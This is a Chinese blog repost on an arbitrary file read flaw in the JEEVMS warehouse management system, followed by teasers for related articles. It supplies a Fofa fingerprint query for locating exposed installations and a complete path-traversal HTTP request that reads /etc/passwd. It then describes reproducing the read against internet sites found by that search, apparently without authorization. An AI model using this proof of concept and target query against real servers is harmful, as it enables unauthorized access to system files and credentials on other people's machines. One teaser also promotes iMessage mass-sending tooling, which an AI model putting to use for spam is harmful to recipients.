JEEVMS仓库管理系统任意文件读取漏洞

news/2024/11/17 9:44:04/文章来源:https://www.cnblogs.com/LeouMaster/p/18200402

漏洞描述

该漏洞由于系统未能正确实施或执行对文件的访问控制权限控制,允许未经授权的用户访问或读取文件,并且应用程序未能对用户输入进行适当验证,攻击者可以构造特殊的输入,如路径遍历攻击读取系统文件内容,导致信息泄露

Fofa:

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg=="

POC:

GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

漏洞复现

在fofa中搜索资产,共有267条数据匹配

image-20240519152147266

访问目标网站,在url后面拼接上/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd

image-20240519152730226

image-20240519152801450

拼接payload后页面只有一个图标,需要查看网页源代码,但是鼠标右键和使用快捷键都无法查看网页源代码,需要将url前面的http://修改为view-source://

image-20240519153103038

另一个网站存在漏洞的截图

image-20240519153430031

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/708784.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vulnhub--JIS靶场

vulnhub--JIS靶场

环境搭建 kali(攻击机,NAT):192.168.96.4 靶机(linux,NAT):ip未知 信息收集 主机探测 netdiscover -i 监听网卡发现96网段存活主机,猜测是96.5为靶机地址 端口扫描 nmap -sS -v 192.168.96.5(高校快速的扫描,TCP半链接扫描) nmap -A 192.168.96.5(全面扫描,更全面)…
阅读更多...
rthread学习记录汇总-不断更新

rthread学习记录汇总-不断更新

1、rthread 同Linux类似,包含了所有主流的芯片、cpu架构,可从官方获取最新的rt-thread源码后进行裁剪2、可从rthread官网下载env工具,env工具可用来对rtthread源码生成mdk/iar工程 命令式scons --target=mdk5 scons --targe=iar scons自带的编译固件功能,命令为scnons,…
阅读更多...
【0day漏洞复现】北京慧飒科技有限责任公司WEB VIDEO PLATFORM存在未授权访问漏洞

【0day漏洞复现】北京慧飒科技有限责任公司WEB VIDEO PLATFORM存在未授权访问漏洞

阅读须知花果山的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人…
阅读更多...
存钱计划(三)

存钱计划(三)

存钱计划(三) 时间限制(普通/Java):1000MS/30000MS 内存限制:65536KByte 描述 TZC的店铺比较多,上次WY随便走只要能走到就行,现在他学聪明了。WY去买东西的话,确定一家店以后,当然他先要想想怎么样走到那家店走的路最少。店与店之间是有走的方向的,从店A到店B可以,店B到…
阅读更多...
视野修炼-技术周刊第83期 | MarsCode

视野修炼-技术周刊第83期 | MarsCode

① MarsCode - 在线 AI IDE ② Turbo Console Log - 快速创建console ③ mcfly - 命令行历史搜索 ④ emoji-mart - emoji 选择组件 ⑤ OpenSumi 3.0 正式发布 ⑥ ElysiaJS - 基于Bun的Web框架 ⑦ extension.js - 跨浏览器插件开发 ⑧ 服务器实时消息获取5种方案 ⑨ Remix Yours…
阅读更多...
实验4:代码审查

实验4:代码审查

一、实验题目 :代码审查 二、实验目的 1、熟悉编码风格,利用开发环境所提供的平台工具对代码进行自动格式审查; 2、根据代码规范制定代码走查表,并按所制定的审查规范互审代码。 三、实验内容 1、IDEA环境和PyCharm环境二选一; IDEA环境 (1)预先准备在IDEA环境下实现对输…
阅读更多...
BUUCTF-WEB(9-14)

BUUCTF-WEB(9-14)

[极客大挑战 2019]Secret File 打开题目查看源码,找到了一个文件然后就是一个按钮,点击后,他应该是反应了,但是我们看不到那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了然后访问这个网页就是一个源码这里没有过滤php://filter ?file=php:/…
阅读更多...
iMessage群发,苹果iMessage短信,苹果iMessage推信,电脑版Mac Os系统自动群发iMessage完美实现 - 电脑端升级版

iMessage群发,苹果iMessage短信,苹果iMessage推信,电脑版Mac Os系统自动群发iMessage完美实现 - 电脑端升级版

一、PC电脑版苹果系统(Mac OS)上实现imessage群发总结为以下几种方式: /*MacOS苹果系统,正常情况下,只能安装到苹果公司自己出品的Mac电脑,俗称白苹果,不能安装到各种组装机或者其他品牌的品牌机上,黑苹果的的原理,就是通过一些 “破解补丁” 工具欺骗macOS系统,让苹果系统…
阅读更多...
pip虚拟环境安装包

pip虚拟环境安装包

pip虚拟环境安装包 问题描述 通常情况下,我们常使用Conda创建虚拟环境,然后再在虚拟环境内进行安装相应的软件包。虚拟环境可以让我们免收软件包的版本冲突的问题。但是有一些软件包不能通过Conda安装,只能通过pip安装。通常情况下,pip安装的软件包作用于全局,因而又会导致…
阅读更多...
jvm整体架构

jvm整体架构

阅读更多...
OWASP-Hackademic-Challenges

OWASP-Hackademic-Challenges

1.靶场安装 靶场下载:https://code.google.com/archive/p/owasp-hackademic-challenges/downloads 在phpstudy中搭建即可 访问页面:2.OWASP Hackademic Challenge – Challenge 1 2.1.解题点击链接,进入靶场页面上没有什么有用的消息,查看页面源代码(Ctrl+U)可以找到不同…
阅读更多...
salesforce零基础学习(一百三十七)零碎知识点小总结(九)

salesforce零基础学习(一百三十七)零碎知识点小总结(九)

本篇参考: https://help.salesforce.com/s/articleView?id=release-notes.rn_lab_conditional_visibiliy_tab.htm&release=250&type=5 https://help.salesforce.com/s/articleView?id=release-notes.rn_automate_flow_builder_automation_lightning_app.htm&re…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023